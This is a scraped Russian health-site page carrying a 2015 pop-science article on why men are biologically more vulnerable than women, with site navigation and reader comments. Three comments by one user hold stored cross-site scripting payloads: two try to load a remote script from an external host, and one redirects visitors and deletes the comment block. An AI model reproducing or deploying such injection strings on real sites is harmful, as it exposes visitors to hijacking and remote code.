Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Кто сильнее: мужчины или ...  >>  Кто сильнее: мужчины или женщины? Вы будете в шоке!
 
Обратная связь
 

Кто сильнее: мужчины или женщины? Вы будете в шоке!

Размер шрифта
06 марта 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Мы привыкли считать мужчин сильными и выносливыми, однако они куда менее устойчивы к вредным факторам окружающей среды, нежели женщины. Причина в генах, именно в них записаны слабости сильного пола.

Кто сильнее: мужчины или женщины? Вы будете в шоке!

Прежде всего стоит отметить, что мужчин на планете становится все меньше. Мать природа позаботилась о мужчинах заранее и создала им некий «запас»: в среднем на 100 девочек всегда рождалось 106 мальчиков. Однако в последние десятилетия тенденция изменилась: мальчики стали рождаться немного реже. Причем риск родиться недоношенными (до 37 недели беременности) у мальчиков на 66% выше, чем у девочек, а шанс умереть в возрасте до года у мальчиков выше на 30%.

Став старше, мальчики сталкиваются с новыми проблемами. Они куда более подвержены различным неврологическим заболеваниям. Аутизм у них встречается в 5 раз чаще, чем у девочек, да и астма чаще встречается именно среди мальчиков. Почему же так происходит? Оказывается, все трудности начинаются еще во время внутриутробного развития: у мужчин оно устроено сложнее, чем у женщин. К тому же значительную роль играют гены, а также уровень и баланс гормонов.

Превращение группы клеток в ребенка длится целых 9 месяцев, и в течение этого времени организм плода очень уязвим. Женский пол для человека – это «пол по умолчанию»: в утробе матери у всех нас есть женские органы (именно поэтому у мужчин есть соски). Далее следует сложная трансформация от женщины к мужчине, которая происходит внутри матки. Этот путь полон опасностей. Когда на восьмой неделе в организме плода образуется первая порция тестостерона, происходят изменения головного мозга по мужскому типу. Часть клеток гибнет, а в некоторых областях (например, отвечающих за сексуальное и агрессивное поведение) количество нейронов увеличивается. Женская половая система превращается в более сложную мужскую, развиваются ткани яичек и предстательной железы. Таким образом, для «создания» мужчины необходимо большее число клеток и тканей; именно поэтому так велика вероятность ошибок, к тому же это объясняет чувствительность мужского организма ко многим вредным веществам.

До 2001 года многие дома обрабатывались хлорпирифосом – инсектицидом, который впоследствии был запрещен. Ученые установили, что этот химикат негативно влияет на внутриутробное развитие плода. Однако у мальчиков наблюдалось куда более значительное снижение умственных способностей, нежели у девочек. Фталаты – вещества, использовавшиеся в производстве игрушек, также оказались вредны для беременных женщин. У их детей впоследствии наблюдались нарушения поведения, агрессия и дефицит внимания. И снова среди мальчиков эти проблемы были более выражены. Все эти вредные вещества действуют подобно половым гормонам – эстрогенам и тестостерону. Они нарушают нормальный баланс гормонов и, соответственно, процесс развития плода, однако именно на мужчинах это сказывается в наибольшей степени.

Помимо всего прочего, мужская комбинация хромосом – XY – сама по себе очень уязвима. Женская версия XX обеспечивает защиту: если в одной из Х хромосом есть генетический дефект, то всегда остается вторая Х хромосома, которая возьмет все функции на себя. У мужчин Х хромосома только одна, поэтому у них нет здоровой копии неисправного гена.

Мы определенно должны принять тот факт, что и у мужчин есть свои слабости. И это еще один повод искать новые средства защиты от вредного влияния окружающей среды, ведь от здоровья мужчин зависит и здоровье всех будущих поколений.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - his shadow

08 марта 2015 в 14:27

Цитировать   |   Пожаловаться

Опять старые данные выдаются за новые.
Об этом было известно ну лет 15 назад.....

А то, что "возраст дожития"- какое мерзкое словосочетания у мужчин лет на 10 меньше, чем у женщин....так вообще было известно и до исторического материализма.
Не надоело старьё ворошить ?

2 - zzzzzz

30 июня 2015 в 18:24

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 21:22

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 22:17

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Три повода сохранить брак   Как пережить жару дома   Вы живете с неудачником? 6 причин, почему вы не можете уйти от него   Голос мужчины скажет, хочет он от вас детей или нет  
17 сентября 2012Найден ген счастья! 23 января 2013Мужчины не смотрят на женскую грудь
 
19 октября 2012Мужчины и женщины воспринимают мир по-разному 25 сентября 2012Женщины и мужчины видят по-разному!
 

Слайдшоу

1
Небулайзер Сomp AIR OMRON С28
Небулайзер OMRON C24 Kids
Небулайзер OMRON С20 basic

Тесты

1
Что вы знаете о груди?
Яички – удивительный орган
Как контролировать бронхиальную астму у взрослых
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.